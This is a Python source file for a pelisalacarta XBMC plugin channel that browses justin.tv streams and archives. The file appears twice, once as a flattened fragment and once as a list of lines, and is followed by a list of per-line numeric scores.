'+bitrate+'\nLanguage: '+lang+'\nViews: '+views if config.get_setting("streamlive") == "true": scrapedtitle =title + ' [%s] BitRate: %s (%s)' %(name,bitrate,lang) itemlist.append( Item(channel = item.channel, action = "playVideo" , title = scrapedtitle.encode("utf-8") , url = scrapedurl , thumbnail = scrapedthumbnail, plot = scrapedplot.encode("utf-8"), category = item.plot, totalItems= totalItems, fanart = scrapedthumbnail, context = '7', # 7 Lista videos archivados folder = False )) else: scrapedtitle =title + ' [%s] (%s)' %(name,lang) itemlist.append( Item(channel = item.channel , action = "listarchives" , title = scrapedtitle.encode("utf-8") , url = scrapedurl , thumbnail = scrapedthumbnail, plot = scrapedplot.encode("utf-8"), category = item.plot, totalItems = totalItems, fanart = fanart_thumb, extra = fanart_thumb, context = '6', # 6 ver canal en vivo folder = True )) if (DEBUG): logger.info("title=["+scrapedtitle+"], url=["+scrapedurl+"], thumbnail=["+scrapedthumbnail+"]") if totalItems >=limit: offset1 = re.compile('offset=(.+?)&').findall(url)[0] offset2 = str(int(offset1)+limit+1) scrapedurl = item.url.replace("offset="+offset1,"offset="+offset2) scrapedtitle = item.title+"|Next Page >>" scrapedthumbnail = '' scrapedplot = '' itemlist.append( Item(channel=item.channel , action="listchannel" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot, category=item.category, fanart=fanart )) return itemlist def listarchives(item): logger.info("[justin.tv.py] listarchives") if "Next Page >>" in item.title: url = item.url else: url = 'http://api.justin.tv/api/channel/archives/'+item.url+'.json?offset=0&limit='+str(limit) try: data = scrapertools.cache_page(url) if len(data)==0:raise except: if item.action == 'getplayByID': return archivesempty() return logger.info(data) datadict = json.loads(data) totalItems = len(datadict) itemlist = [] for match in datadict: try: video_url = match['video_file_url'] except:continue try: broadcast_part = match['broadcast_part'] except: broadvast_part = '' try: start_time = match['start_time'] except: start_time = '' try: thumbnail = match['image_url_medium'] except: thumbnail = '' try: duration = match['length'] except: duration = '' #print 'duration: '+duration try: title = match['title'] except: title = '' scrapedtitle = title + " Part: (%s) Start time: %s" %(broadcast_part,start_time) itemlist.append( Item(channel=item.channel , action="play" , server = 'Directo', title=scrapedtitle.encode("utf-8") , url=video_url , thumbnail=thumbnail, plot=item.url,category = item.category,duration=duration, totalItems=totalItems,fanart = item.extra,context='6', folder=False )) if totalItems >=limit: offset1 = re.compile('offset=(.+?)&').findall(url)[0] offset2 = str(int(offset1)+limit+1) scrapedurl = url.replace("offset="+offset1,"offset="+offset2) scrapedtitle = "Next Page >>" scrapedthumbnail = '' scrapedplot = '' itemlist.append( Item(channel=item.channel , action="listarchives" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot, category=item.category, extra=item.extra )) return itemlist def playVideo(item): logger.info("[justin.tv.py] playVideo") channelname=item.url if channelname.endswith('.flv'): channelname = item.plot rtmp = "" try: if config.get_setting('realdebridpremium')=="true": from servers import realdebrid url = "http://justin.tv/"+channelname rtmp = realdebrid.get_video_url( page_url=url , premium=(config.get_setting("realdebridpremium")=="true") , user=config.get_setting("realdebriduser") , password=config.get_setting("realdebridpassword"), video_password="" ) logger.info('rtmp = %s'%rtmp) except:pass if rtmp.startswith('rtmp'): listItem = xbmcgui.ListItem(path = rtmp) listItem.setProperty('IsPlayable', 'true') xbmcplugin.setResolvedUrl(pluginhandle, True, listItem) else: req = urllib2.Request('http://justin.tv/') response = urllib2.urlopen(req) link=response.read() response.close() match = re.compile('swfobject.embedSWF\("(.+?)"').findall(link) swf = ' swfUrl='+str(match[0]) req = urllib2.Request('http://usher.justin.tv/find/'+channelname+'.json?type=live') req.addheaders = ('Referer', 'http://justin.tv/') response = urllib2.urlopen(req) link=response.read() response.close() logger.info(link) datadict = json.loads(link) try: token = ' jtv='+datadict[0]["token"].replace('\\','\\5c').replace('"','\\22').replace(' ','\\20') connect = datadict[0]["connect"]+'/'+datadict[0]["play"] Pageurl = ' Pageurl=http://www.justin.tv/'+channelname rtmp = connect+token+swf+Pageurl logger.info('rtmp = %s'%rtmp) listItem = xbmcgui.ListItem(path = rtmp) listItem.setProperty('IsPlayable', 'true') xbmcplugin.setResolvedUrl(pluginhandle, True, listItem) except: logger.info('canal %s esta offline'%channelname) xbmcplugin.setResolvedUrl(pluginhandle, False, xbmcgui.ListItem()) channeloffline(channelname) def _language(item): _language_(item) return def _language_(item): lang = config.get_setting('justin_lang') if "," in lang: lang = lang.split(",") elif lang == "": lang = ["all"] else: lang = [lang] lenguajes = languages squareRoot=scrapertools.unescape("&#8730;") for i in lang: if i == 'all': idx = abbrev.index(i) lenguajes[idx]=lenguajes[idx]+" "+squareRoot break idx = abbrev.index(i) lenguajes[idx]=lenguajes[idx]+" "+squareRoot dia = xbmcgui.Dialog() seleccion = dia.select("Choice a language", lenguajes) if seleccion == -1:return abb = languages[seleccion] logger.info("seleccion : %s %s" %(seleccion,abb)) lang = '' for count,i in enumerate(lenguajes): if seleccion == 0: lang = 'all' break if squareRoot in i: if count == seleccion:continue if abbrev[count]=='all':continue if len(lang)>0: lang = lang + "," + abbrev[count] else: lang = abbrev[count] if count == seleccion: if len(lang)>0: lang = lang + "," + abbrev[count] else: lang = abbrev[count] config.set_setting('justin_lang',lang) logger.info("lenguajes configurados: "+lang) xbmc.executebuiltin( "Container.Refresh" ) return def channelEmpty(): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ," "*18+config.get_localized_string(30411)) def LoginEmpty(): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ," "*18+config.get_localized_string(30422)) def channeloffline(channelname): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ,config.get_localized_string(30423)%channelname) def archivesempty(): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ," "*18+config.get_localized_string(30412)) def channelANDarchivesEmpty(): return xbmcgui.Dialog().ok("Pelisalacarta - Justin TV" ," "*18+config.get_localized_string(30411)," "*18+config.get_localized_string(30412))
[ "# -*- coding: utf-8 -*-\n", "#------------------------------------------------------------\n", "# pelisalacarta - XBMC Plugin\n", "# Canal para justin.tv by Bandavi\n", "# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/\n", "#------------------------------------------------------------\n", "import urlparse,urllib2,urllib,re\n", "import os, sys\n", "import xbmc,xbmcgui,xbmcplugin\n", "\n", "from core import logger\n", "from core import config\n", "from core import scrapertools\n", "from core.item import Item\n", "from servers import servertools\n", "from platformcode.xbmc import xbmctools\n", "try:\n", " import json\n", "except:\n", " import simplejson as json\n", "\n", "__channel__ = \"justintv\"\n", "__category__ = \"G\"\n", "__type__ = \"generic\"\n", "__title__ = \"Justin.tv\"\n", "__language__ = \"\"\n", "__creationdate__ = \"20111128\"\n", "\n", "DEBUG = config.get_setting(\"debug\")\n", "pluginhandle = int(sys.argv[1])\n", "\n", "IMAGES_PATH = xbmc.translatePath( os.path.join( config.get_runtime_path(), 'resources' , 'images' , 'posters' ) )\n", "fanart = xbmc.translatePath(os.path.join( config.get_runtime_path(), 'resources' , 'images' ,'fanart','justintv.png'))\n", "if config.get_setting(\"thumbnail_type\")==\"0\":\r\n", " WEB_PATH = \"http://pelisalacarta.mimediacenter.info/posters/\"\r\n", "else:\r\n", " WEB_PATH = \"http://pelisalacarta.mimediacenter.info/banners/\"\r\n", "\r\n", "jtv_icon = WEB_PATH+\"justintv.png\"\r\n", "\n", "all = config.get_localized_string(30419)\n", "\n", "languages = [all,'Arabic','Català','Cerky','Dansk','Deutsch','Greek','English','Español','Eusti Keel','suomi','Francais',\n", " 'Hindi' ,'Hrvatski','bahasa Indonesia','Italiano','Hebrew','Japanese','Korean','Lietuviu','Nederlands',\n", " 'Norsk','Polski','Portugues','Romana','Russian','Serbian','Svenska','Talagog','Turkey','Tieng Viet',\n", " 'Chinese','Taiwanese']\n", "abbrev = ['all','ar','ca','cs','da','de','el','en','es','et','fi','fr','hi','hr','id','it','iw','ja','ko','lt','nl','no','pl','pt',\n", " 'ro','ru','sr','sv','tl','tr','vi','zh-CN','zh-TW']\n", "limit = 50\n", "URL_CATEGORY_MENU = 'http://%s.justin.tv/directory/dropmenu/category?lang=%s&amp;order=hot'\n", "URL_SUBCATEGORY_MENU = 'http://%s.justin.tv/directory/dropmenu/subcategory/%s?order=hot&amp;lang=%s'\n", "MenuLang = {'English':'en','Spanish':'es','Italian':'it','Catalan':'ca','French':'fr','Portuguese':'pt','German':'de'}\n", "try:\n", " language_menu = MenuLang[xbmc.getLanguage()]\n", "except:\n", " language_menu = 'en'\n", "\n", "def isGeneric():\n", " return True\n", "\n", "def mainlist(item):\n", " logger.info(\"[justintv.py] mainlist\")\n", "\n", " itemlist = []\n", " try:\n", " lang = config.get_setting('justin_lang')\n", " if \",\" in lang:\n", " langs = lang.split(\",\")\n", " lang = ''\n", " for i in langs:\n", " idx = abbrev.index(i)\n", " if len(lang)>0:\n", " lang = lang + \",\" + languages[idx]\n", " else:\n", " lang = languages[idx]\n", " \n", " else:\n", " idx = abbrev.index(lang)\n", " lang = languages[idx]\n", " except:\n", " lang = 'all'\n", " idx = abbrev.index(lang)\n", " lang = languages[idx]\n", " \n", "\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30420) + ' (%s)' %lang, action=\"_language\" ,url = \"\", thumbnail =WEB_PATH+ \"language.jpg\",fanart = fanart, folder = False))\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30414), action=\"listcategory\" ,url = \"true\", thumbnail='http://www-cdn.jtvnw.net/images/redesign/fp_vector_camera.png',fanart = fanart))\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30413), action=\"listcategory\" ,url = \"false\", thumbnail='',fanart = fanart))\n", " return itemlist\n", "\n", "def listcategory(item):\n", " itemlist = []\n", " config.set_setting(\"streamlive\",item.url)\n", " listcat = getlistcategory()\n", " if item.url=='false':\n", " title = config.get_localized_string(30408)\n", " else:\n", " title = ''\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30416)+title, action=\"favorites\" ,url = \"\", thumbnail=WEB_PATH+ \"favoritos.png\",fanart = fanart))\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30415), action=\"getplayByID\" ,url = \"\", thumbnail=\"http://thecustomizewindows.com/wp-content/uploads/2011/12/Best-Keyboard-Apps.png\",fanart = fanart))\n", " itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30417), action=\"search\" ,url = \"\", thumbnail=WEB_PATH+\"buscador.png\",fanart = fanart))\n", " for category in listcat:\n", " itemlist.append( Item(channel=__channel__, title=scrapertools.unescape(category[1]), action=\"subCategories\" ,url = category[0], thumbnail=\"http://www-cdn.jtvnw.net/images/category_icons/%s.png\" %category[0],fanart = fanart))\n", "\n", " return itemlist\n", " \n", "def getlistcategory():\n", " data = scrapertools.cache_page(URL_CATEGORY_MENU %(language_menu,language_menu))\n", " patron = '<li class=\"category\"><a href=\"/directory/([^\\?]+)\\?.+?\">(.+?)</a></li>'\n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " list = []\n", " for match in matches:\n", " list.append([match[0],match[1]])\n", " return list\n", "\n", "def search(item,texto):\n", " \n", " texto = texto.replace(' ','+')\n", " item.title = 'search'\n", " item.url = url = 'http://api.justin.tv/api/stream/search/'+texto+'.json?offset=0&limit='+str(limit)\n", " itemlist = getlistchannel(item)\n", " if config.get_setting('streamlive')=='true':\n", " xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true')\n", " else:\n", " return itemlist\n", "\n", " \n", "def getplayByID(item):\n", " logger.info(\"[justintv.py] plyByID\")\n", " tecleado = \"\"\n", " default = \"\"\n", " itemlist = []\n", " tecleado = teclado(heading=config.get_localized_string(30405))\n", " if len(tecleado)>0:\n", " item.url = 'http://api.justin.tv/api/stream/list.json?channel='+tecleado\n", " itemlist = getlistchannel(item)\n", " if len(itemlist)>0:\n", " if config.get_setting('streamlive') == 'true':\n", " xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true')\n", " else:\n", " return itemlist\n", " elif config.get_setting('streamlive') != 'true':\r\n", " xbmc.executebuiltin(\"XBMC.Notification(Justin tv,Streaming no encontrado... verificando archivos\"+\",5000,\"+jtv_icon+\")\")\r\n", " item.url = tecleado\r\n", " item.action = 'getplayByID'\r\n", " itemlist = listarchives(item)\r\n", " if itemlist is not None and len(itemlist)>0:\r\n", " return itemlist\r\n", " else:\r\n", " channelANDarchivesEmpty()\n", " else:\r\n", " channelEmpty()\n", " return\n", "\n", "def teclado(default=\"\", heading=\"\", hidden=False):\n", " tecleado = \"\"\n", " keyboard = xbmc.Keyboard(default,heading,hidden)\n", " keyboard.doModal()\n", " if (keyboard.isConfirmed()):\n", " tecleado = keyboard.getText()\n", " if len(tecleado)<=0:\n", " return \"\"\n", " return tecleado\n", " \n", "def subCategories(item):\n", " logger.info(\"[justin.tv.py] subCategories\")\n", "\n", " category = item.url\n", " \n", " url = URL_SUBCATEGORY_MENU %(language_menu,category,language_menu)\n", " data = scrapertools.cache_page(url)\n", " logger.info(data)\n", " itemlist = []\n", " patron = '<li class=\"subcategory\"><a href=\"/directory/'+category+'/([^\\?]+)\\?.+?\">(.+?)</a></li>'\n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " scrapedthumbnail = \"\"\n", " scrapedplot = item.title\n", " itemlist.append( Item(channel=item.channel , action=\"listchannel\" , title=config.get_localized_string(30421) , url=\"all\" , thumbnail=scrapedthumbnail, plot=scrapedplot,category=category,fanart=fanart ))\n", " for match in matches:\n", " scrapedurl = match[0]\n", " scrapedtitle =match[1]\n", "\n", " if (DEBUG): logger.info(\"title=[\"+scrapedtitle+\"], url=[\"+scrapedurl+\"], thumbnail=[\"+scrapedthumbnail+\"]\")\n", "\n", " # Añade al listado de XBMC\n", " itemlist.append( Item(channel=item.channel , action=\"listchannel\" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot,category=category,fanart=fanart ))\n", " \n", " return itemlist\n", "\n", "def favorites(item):\n", " if item.url == '':\n", " username = config.get_setting(\"justin_login\")\n", " else:\n", " username = item.url\n", " if username == \"\":\n", " LoginEmpty()\n", " config.open_settings()\n", " item.url = config.get_setting(\"justin_login\")\n", " if item.url == '':return\n", " favorites(item)\n", " return \n", " item.title = \"favorites\"\n", " if config.get_setting('streamlive')=='true':\n", " livetrue='&live=true'\n", " else:\n", " livetrue = ''\n", " item.url = 'http://api.justin.tv/api/user/favorites/'+str(username)+'.json?offset=0&limit='+str(limit)+livetrue\r\n", " itemlist = getlistchannel(item)\r\n", " if not livetrue:\r\n", " return itemlist\n", " xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true')\n", " return \n", "\r\n", "def addToFavorites(item):\r\n", " ''' Poner aqui el proceso para añadir un canal en favoritos/follows de una cuenta en Justin.tv'''\r\n", " pass\r\n", "\r\n", "def removeFromFavorites(item):\r\n", " ''' Poner aqui el proceso para eliminar un canal de favoritos/follows de una cuenta en Justin.tv'''\r\n", " pass\r\n", "\n", "def listchannel(item):\n", " \n", " if not \"|Next Page >>\" in item.title:\n", " try:\n", " lang = config.get_setting(\"justin_lang\")\n", " if len(lang) == 0:\n", " lang = 'all'\n", " except:\n", " lang = \"all\"\n", " item.title = item.url\n", " if lang == 'all':\n", " lang = ''\n", " else:\n", " lang = '&language='+lang\n", " if 'all' in item.url:\n", " item.url = \"http://api.justin.tv/api/stream/list.json?category=%s%s&offset=0&limit=%d\" %(item.category,lang,limit)\n", " else:\n", " item.url = \"http://api.justin.tv/api/stream/list.json?subcategory=%s%s&offset=0&limit=%d\" %(item.title,lang,limit)\n", " itemlist = getlistchannel(item)\r\n", " if config.get_setting('streamlive')=='true':\n", " xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true')\n", " return \r\n", " else:\r\n", " return itemlist\n", "\n", "def getlistchannel(item):\n", " logger.info(\"[justintv.py] getlistchannel\")\n", " \n", " url = item.url\n", " title = item.title\n", " if \"|Next Page >>\" in item.title:\n", " item.title = item.title.split('|')[0]\r\n", " if item.title == 'favorites':\r\n", " context = '|9' # Eliminar un canal de favoritos, en el listado de favoritos solo remover\r\n", " else:\r\n", " context = '|8' # Añade un canal a favoritos, en los demas listados solo añadir\n", " data = scrapertools.cache_page(url)\n", " logger.info(data)\n", " datadict = json.loads(data)\n", " totalItems = len(datadict)\n", " itemlist = []\n", " #print item.action\n", " c = 0\n", " try:\n", " datadict = sorted(datadict, key=lambda k: k['video_bitrate'],reverse=True)\n", " except:\n", " pass\n", " for match in datadict:\n", " try:\n", " name = match['name'].split('user_')[-1]\n", " except:\n", " try:\n", " name = match['channel']['login']\n", " if name is None or name =='':\n", " raise\n", " except:\n", " name = match['login']\n", " try:\n", " title = match['channel']['title']\n", " if title is None or title == '':\n", " raise\n", " except:\n", " try:\n", " title = match['title']\n", " if title is None:\n", " title = ''\n", " except:\n", " title = ''\n", " try:\n", " title = title\n", " if title is None or title == '':\n", " raise\n", " except:\n", " title = name\n", " \n", " try:\n", " tags = scrapertools.unescape(match['channel']['tags'])\n", " if tags is None or tags == '':\n", " raise\n", " except:\n", " try:\n", " tags = scrapertools.unescape(match['tags']).strip()\n", " if tags is None or tags == '':\n", " raise\n", " except:\r\n", " tags = ''\n", " try:\n", " status = scrapertools.unescape(match['channel']['status']).strip()\n", " if status is None or status == '':\n", " raise\n", " except:\n", " try:\n", " status = scrapertools.unescape(match['status']).strip()\n", " if status is None or status == '':\n", " raise\n", " except:\n", " status = ''\n", " try:\n", " subcat = match['channel']['category_title']\n", " if subcat is None or subcat == '':\n", " raise\n", " except:\n", " try:\n", " subcat = match['category']\n", " if subcat is None:\n", " raise\n", " except:\n", " subcat = ''\n", " try:\n", " views = match['channel']['views_count']\n", " except:\n", " try:\n", " views = match['channel_view_count']\n", " except:\n", " views = ''\n", " \n", " try:\n", " bitrate = str(match['video_bitrate']).split('.')[0]\n", " except:\n", " bitrate = ''\n", " try:\n", " lang = match['language']\n", " except:\n", " lang = ''\n", " try:\n", " scrapedthumbnail = match['channel']['screen_cap_url_medium']\n", " \n", " except:\n", " scrapedthumbnail = match['screen_cap_url_medium']\n", " try:\n", " fanart_thumb = match['channel']['image_url_huge']\n", " except:\n", " try:\n", " fanart_thumb = match['image_url_huge']\n", " except:\n", " fanart_thumb = fanart\n", " scrapedurl = name\n", " \n", " idx = abbrev.index(lang)\n", " lang = languages[idx].decode('utf-8')\n", " scrapedplot = title +'\\nStatus: '+status+'\\nTags: '+tags+ '\\nChannel Name: '+name+'\\nBitrate: '+bitrate+'\\nLanguage: '+lang+'\\nViews: '+views\n", "\n", " if config.get_setting(\"streamlive\") == \"true\":\n", " scrapedtitle =title + ' [%s] BitRate: %s (%s)' %(name,bitrate,lang)\n", " itemlist.append( Item(channel = item.channel,\r\n", " action = \"playVideo\" ,\r\n", " title = scrapedtitle.encode(\"utf-8\") ,\r\n", " url = scrapedurl , \r\n", " thumbnail = scrapedthumbnail, \r\n", " plot = scrapedplot.encode(\"utf-8\"),\r\n", " category = item.plot, \r\n", " totalItems= totalItems,\r\n", " fanart = scrapedthumbnail, \r\n", " context = '7', # 7 Lista videos archivados \r\n", " folder = False \r\n", " ))\n", " else:\n", " scrapedtitle =title + ' [%s] (%s)' %(name,lang)\n", " itemlist.append( Item(channel = item.channel , \r\n", " action = \"listarchives\" , \r\n", " title = scrapedtitle.encode(\"utf-8\") , \r\n", " url = scrapedurl , \r\n", " thumbnail = scrapedthumbnail, \r\n", " plot = scrapedplot.encode(\"utf-8\"),\r\n", " category = item.plot, \r\n", " totalItems = totalItems,\r\n", " fanart = fanart_thumb, \r\n", " extra = fanart_thumb, \r\n", " context = '6', # 6 ver canal en vivo \r\n", " folder = True \r\n", " ))\n", " if (DEBUG): logger.info(\"title=[\"+scrapedtitle+\"], url=[\"+scrapedurl+\"], thumbnail=[\"+scrapedthumbnail+\"]\")\n", "\n", " if totalItems >=limit:\n", " offset1 = re.compile('offset=(.+?)&').findall(url)[0]\n", " offset2 = str(int(offset1)+limit+1)\n", " scrapedurl = item.url.replace(\"offset=\"+offset1,\"offset=\"+offset2)\n", " scrapedtitle = item.title+\"|Next Page >>\"\n", " scrapedthumbnail = ''\n", " scrapedplot = ''\n", " itemlist.append( Item(channel=item.channel , action=\"listchannel\" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot, category=item.category, fanart=fanart ))\n", " return itemlist\n", "\n", "def listarchives(item):\n", " logger.info(\"[justin.tv.py] listarchives\")\n", " if \"Next Page >>\" in item.title:\n", " url = item.url\n", " else:\n", " url = 'http://api.justin.tv/api/channel/archives/'+item.url+'.json?offset=0&limit='+str(limit)\n", " try:\n", " data = scrapertools.cache_page(url)\r\n", " if len(data)==0:raise\n", " except:\r\n", " if item.action == 'getplayByID':\r\n", " return\n", " archivesempty()\n", " return\n", " logger.info(data)\n", " datadict = json.loads(data)\n", " totalItems = len(datadict)\n", " itemlist = []\n", "\n", " for match in datadict:\r\n", " try:\n", " video_url = match['video_file_url']\r\n", " except:continue\r\n", " try:\n", " broadcast_part = match['broadcast_part']\r\n", " except:\r\n", " broadvast_part = ''\r\n", " try:\n", " start_time = match['start_time']\r\n", " except:\r\n", " start_time = ''\r\n", " try:\r\n", " thumbnail = match['image_url_medium']\r\n", " except:\r\n", " thumbnail = ''\r\n", " try:\n", " duration = match['length']\r\n", " except:\r\n", " duration = ''\n", " #print 'duration: '+duration\n", " try:\n", " title = match['title']\n", " except:\n", " title = ''\n", " scrapedtitle = title + \" Part: (%s) Start time: %s\" %(broadcast_part,start_time)\n", " itemlist.append( Item(channel=item.channel , action=\"play\" , server = 'Directo', title=scrapedtitle.encode(\"utf-8\") , url=video_url , thumbnail=thumbnail, plot=item.url,category = item.category,duration=duration, totalItems=totalItems,fanart = item.extra,context='6', folder=False ))\n", "\n", " if totalItems >=limit:\n", " offset1 = re.compile('offset=(.+?)&').findall(url)[0]\n", " offset2 = str(int(offset1)+limit+1)\n", " scrapedurl = url.replace(\"offset=\"+offset1,\"offset=\"+offset2)\n", " scrapedtitle = \"Next Page >>\"\n", " scrapedthumbnail = ''\n", " scrapedplot = ''\n", " itemlist.append( Item(channel=item.channel , action=\"listarchives\" , title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail, plot=scrapedplot, category=item.category, extra=item.extra ))\n", " \n", " return itemlist\n", " \n", "def playVideo(item):\n", " logger.info(\"[justin.tv.py] playVideo\")\n", "\n", " channelname=item.url\n", " if channelname.endswith('.flv'):\n", " channelname = item.plot\r\n", " rtmp = \"\"\r\n", " try:\r\n", " if config.get_setting('realdebridpremium')==\"true\":\r\n", " from servers import realdebrid\r\n", " url = \"http://justin.tv/\"+channelname\r\n", " rtmp = realdebrid.get_video_url( page_url=url , premium=(config.get_setting(\"realdebridpremium\")==\"true\") , user=config.get_setting(\"realdebriduser\") , password=config.get_setting(\"realdebridpassword\"), video_password=\"\" )\n", " logger.info('rtmp = %s'%rtmp)\r\n", " except:pass\r\n", " \r\n", " if rtmp.startswith('rtmp'):\r\n", " listItem = xbmcgui.ListItem(path = rtmp)\r\n", " listItem.setProperty('IsPlayable', 'true')\r\n", " xbmcplugin.setResolvedUrl(pluginhandle, True, listItem)\r\n", " else:\r\n", " req = urllib2.Request('http://justin.tv/')\n", " response = urllib2.urlopen(req)\n", " link=response.read()\n", " response.close()\n", " match = re.compile('swfobject.embedSWF\\(\"(.+?)\"').findall(link)\n", " swf = ' swfUrl='+str(match[0])\n", " req = urllib2.Request('http://usher.justin.tv/find/'+channelname+'.json?type=live')\n", " req.addheaders = ('Referer', 'http://justin.tv/')\n", " response = urllib2.urlopen(req)\n", " link=response.read()\n", " response.close()\n", " logger.info(link)\n", " datadict = json.loads(link)\n", " try:\n", " token = ' jtv='+datadict[0][\"token\"].replace('\\\\','\\\\5c').replace('\"','\\\\22').replace(' ','\\\\20')\n", " connect = datadict[0][\"connect\"]+'/'+datadict[0][\"play\"]\n", " Pageurl = ' Pageurl=http://www.justin.tv/'+channelname\n", " rtmp = connect+token+swf+Pageurl\n", " logger.info('rtmp = %s'%rtmp)\n", " listItem = xbmcgui.ListItem(path = rtmp)\n", " listItem.setProperty('IsPlayable', 'true')\n", " xbmcplugin.setResolvedUrl(pluginhandle, True, listItem)\n", " except:\n", " logger.info('canal %s esta offline'%channelname)\n", " xbmcplugin.setResolvedUrl(pluginhandle, False, xbmcgui.ListItem())\n", " channeloffline(channelname)\n", "\n", "def _language(item):\n", " _language_(item)\r\n", " return\r\n", "\r\n", "def _language_(item):\r\n", " lang = config.get_setting('justin_lang')\n", " if \",\" in lang:\n", " lang = lang.split(\",\")\n", " elif lang == \"\":\r\n", " lang = [\"all\"]\r\n", " else:\n", " lang = [lang]\n", " lenguajes = languages\n", " squareRoot=scrapertools.unescape(\"&#8730;\")\n", " for i in lang:\n", " if i == 'all':\n", " idx = abbrev.index(i)\n", " lenguajes[idx]=lenguajes[idx]+\" \"+squareRoot\n", " break\n", " idx = abbrev.index(i)\n", " lenguajes[idx]=lenguajes[idx]+\" \"+squareRoot\n", " \n", " dia = xbmcgui.Dialog()\n", " seleccion = dia.select(\"Choice a language\", lenguajes)\n", " if seleccion == -1:return\n", " abb = languages[seleccion]\r\n", " logger.info(\"seleccion : %s %s\" %(seleccion,abb))\n", " lang = ''\n", " for count,i in enumerate(lenguajes):\n", " if seleccion == 0:\n", " lang = 'all'\n", " break\n", " \n", " if squareRoot in i:\n", " if count == seleccion:continue\n", " if abbrev[count]=='all':continue\n", " if len(lang)>0:\n", " lang = lang + \",\" + abbrev[count]\n", " else:\n", " lang = abbrev[count]\n", " if count == seleccion:\n", " if len(lang)>0:\n", " lang = lang + \",\" + abbrev[count]\n", " else:\n", " lang = abbrev[count]\n", " config.set_setting('justin_lang',lang)\n", " logger.info(\"lenguajes configurados: \"+lang)\r\n", " xbmc.executebuiltin( \"Container.Refresh\" )\n", " return \r\n", "\n", "def channelEmpty():\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,\" \"*18+config.get_localized_string(30411))\n", "def LoginEmpty():\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,\" \"*18+config.get_localized_string(30422))\n", "def channeloffline(channelname):\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,config.get_localized_string(30423)%channelname)\n", "def archivesempty():\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,\" \"*18+config.get_localized_string(30412))\r\n", "def channelANDarchivesEmpty():\r\n", " return xbmcgui.Dialog().ok(\"Pelisalacarta - Justin TV\" ,\" \"*18+config.get_localized_string(30411),\" \"*18+config.get_localized_string(30412))" ]
[ 0, 0.016129032258064516, 0, 0, 0, 0.016129032258064516, 0.11764705882352941, 0.06666666666666667, 0.0967741935483871, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.06140350877192982, 0.05042016806722689, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0, 0, 0.09836065573770492, 0.09482758620689655, 0.09734513274336283, 0.05714285714285714, 0.1865671641791045, 0.125, 0, 0.010869565217391304, 0.009900990099009901, 0.11764705882352941, 0, 0, 0.125, 0, 0, 0.058823529411764705, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02564102564102564, 0.03125, 0, 0, 0, 0.07692307692307693, 0, 0.02631578947368421, 0, 0.08333333333333333, 0, 0.029411764705882353, 0, 0.2, 0, 0.07177033492822966, 0.04054054054054054, 0.05555555555555555, 0, 0, 0.041666666666666664, 0, 0.021739130434782608, 0, 0.038461538461538464, 0, 0, 0, 0.0546448087431694, 0.038135593220338986, 0.05142857142857143, 0, 0.04291845493562232, 0, 0, 0.2, 0.043478260869565216, 0.03529411764705882, 0.03488372093023256, 0.017543859649122806, 0, 0, 0, 0.024390243902439025, 0, 0, 0.08333333333333333, 0.2, 0.02857142857142857, 0, 0.01904761904761905, 0, 0.02040816326530612, 0.013157894736842105, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0.012345679012345678, 0, 0.03571428571428571, 0, 0.023809523809523808, 0, 0, 0, 0.007462686567164179, 0, 0, 0, 0.017241379310344827, 0, 0, 0, 0, 0, 0, 0, 0.0196078431372549, 0, 0.03773584905660377, 0, 0, 0, 0.034482758620689655, 0, 0, 0.2, 0.04, 0, 0, 0, 0.2, 0.04225352112676056, 0, 0, 0, 0.029411764705882353, 0.017543859649122806, 0, 0, 0, 0.0430622009569378, 0, 0, 0.03225806451612903, 0, 0.017241379310344827, 0, 0, 0.04591836734693878, 0.2, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0.06060606060606061, 0, 0.0625, 0, 0.02040816326530612, 0.03333333333333333, 0, 0, 0.008547008547008548, 0, 0, 0, 0.013888888888888888, 0.08333333333333333, 0, 0.037037037037037035, 0.009708737864077669, 0, 0, 0.03125, 0.009523809523809525, 0, 0, 0.043478260869565216, 0.2, 0.023809523809523808, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 0, 0, 0, 0.031496062992125984, 0, 0.031496062992125984, 0, 0.02040816326530612, 0.013157894736842105, 0.058823529411764705, 0, 0, 0, 0.038461538461538464, 0, 0.2, 0, 0, 0, 0, 0, 0.02040816326530612, 0, 0.022988505747126436, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0.03571428571428571, 0.08333333333333333, 0, 0, 0, 0, 0.0625, 0, 0, 0.021739130434782608, 0, 0.05, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0, 